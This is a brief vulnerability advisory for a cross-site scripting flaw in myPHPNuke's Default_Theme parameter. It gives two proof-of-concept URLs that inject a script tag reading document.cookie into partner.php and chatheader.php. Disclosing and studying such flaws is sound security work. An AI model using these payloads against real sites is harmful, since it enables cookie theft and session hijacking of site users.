myPHPNuke Default_Theme Cross Site Scripting Vulnerability

myPHPNuke Default_Theme Cross Site Scripting Vulnerability

The following proof of concepts were provided:

http://victim/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>
http://victim/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>